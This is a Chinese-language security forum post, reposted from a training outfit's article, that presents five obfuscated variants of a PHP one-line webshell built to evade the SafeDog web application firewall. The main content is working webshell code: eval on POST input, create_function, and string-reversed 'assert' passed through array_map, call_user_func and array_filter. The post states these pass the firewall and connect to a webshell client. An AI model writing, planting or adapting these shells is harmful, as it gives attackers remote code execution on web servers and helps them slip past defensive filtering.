安全矩阵

 找回密码
 立即注册
搜索
查看: 4617|回复: 0

php一句话绕过安全狗的奇迹淫巧

[复制链接]

98

主题

207

帖子

955

积分

高级会员

Rank: 4

积分
955
发表于 2020-4-4 11:33:03 | 显示全部楼层 |阅读模式
本帖最后由 wholesome 于 2020-4-4 11:37 编辑

转载:https://mp.weixin.qq.com/s?__biz ... 8a1fcbc183d841c4#rd
今天必火老师带大家研究一下那些绕waf一句话的写法,其实,我想说一句话,渗透的本质就是研究代码,会了代码,什么绕waf、免杀都不是问题。我们今天编写几个能过waf的一句话。
最简单的一句话,莫非下面这个,当然这个已被大多数杀软拦截,那么怎么破?
  1. <?php eval($_POST[1])?>
复制代码
0x01:函数调用​​​​​​​
  1. <?php
  2. function bihuo($a,$b){
  3.   eval($a);
  4. }
  5. bihuo($_POST[1],'必火安全是最好的培训机构');
  6. ?>
复制代码

此方法第二个参数$b,并没有实际意义,只是用来干扰,不加会被杀。

0x02: 回调​​​​​​​
  1. <?php
  2. $newfunc = create_function('', "$_POST[1];");
  3. $newfunc();
  4. ?>
复制代码

这个代码和网上流行的略有区别,第二个参数我加了双引号,加了就过狗,不加就不过。

0x03: array_map 变形​​​​​​​
  1. <?php
  2. array_map(strrev(substr('bihuo.cntressa', 8)),$_POST);
  3. ?>
复制代码

这个函数用来写一句话,网上有很多,但是笔者觉得,都写的太麻烦了,主要是传值的时候,我改写了一下,首先是截取,然后再反转,直接菜刀链接,密码任意,这里接受的是$_POST数组,所以,传什么都可以。

执行,安全狗并没有拦截

0x04: call_user_func​​​​​​​
  1. <?php
  2. call_user_func(strrev(substr("bihuo.cn|tressa",9)),$_POST[1]);
  3. ?>
复制代码

这个方法和上个方法类似,但是不同的地方,必须指定密码,否则不执行。

火狐55版本中hackbar链接一下:

0x05: array_filter 换个风格吧,别总substr了,哈哈​​​​​​​
  1. <?php
  2. $a = $_POST[1];  
  3. $arr = array($a);  
  4. array_filter($arr,'a'.'s'."serT");
  5. ?>
复制代码


成功执行

今天就写这五种方法吧,只要会代码,想绕waf不是一件难事,所以,学习渗透测试,切记打好代码基础,零基础的同学可以考虑从php入手,学到至少能做出一个网站项目为止,再学习渗透测试,事半功倍。



回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-4-19 06:50 , Processed in 0.012289 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表